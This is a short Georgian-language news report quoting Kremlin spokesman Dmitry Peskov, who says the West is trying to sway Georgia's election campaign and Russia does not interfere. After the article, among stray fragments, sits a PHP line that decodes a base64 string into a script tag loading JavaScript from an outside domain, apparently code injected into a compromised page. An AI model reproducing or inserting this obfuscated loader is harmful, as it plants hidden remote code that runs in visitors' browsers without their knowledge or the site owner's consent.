celsiusi
ავერსი შნაიდერი

დასავლეთი ცდილობს ზეგავლენა მოახდინოს საქართველოს საარჩევნო კამპანიის მიმდინარეობაზე, რუსეთი კი არ აპირებს ამ ქვეყნის შიდა საქმეებში ჩარევას - ამის შესახებ რუსეთის პრეზიდენტის პრესსპიკერმა დიმიტრი პესკოვმა ჟურნალისტებს განუცხადა.

„რაც შეეხება არჩევნებს, ეს ჩვენი საქმე არ არის. ჩვენ ვხედავთ დასავლეთის ქვეყნების დაუფარავ მცდელობას გავლენა იქონიონ საქართველოს მოქმედ ხელისუფლებაზე და პირდაპირი, დაუფარავი გავლენა მოახდინონ საარჩევნო კამპანიის მიმდინარეობაზე. ჩვენ არანაირი ფორმით არ ვერევით საქართველოს შიდა საქმეებში და ამის გაკეთებას არ ვაპირებთ“, - განაცხადა პესკოვმა.

„საქართველო ჩვენი მეზობელია. თქვენ ჩვენი ურთიერთობების სირთულეები იცით, რაც ამავდროულად არ აფერხებს ორი ქვეყნის საზოგადოებებსა და ხალხებს შორის ჰუმანიტარული კავშირების განვითარებას. ადამიანები აგრძელებენ საქართველოში, რუსეთში მოგზაურობას“, - ამბობს ის.

79
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");